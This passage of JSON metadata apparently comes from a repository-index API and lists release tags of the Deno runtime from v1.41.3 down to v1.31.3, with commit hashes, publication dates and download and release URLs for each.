mmit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","do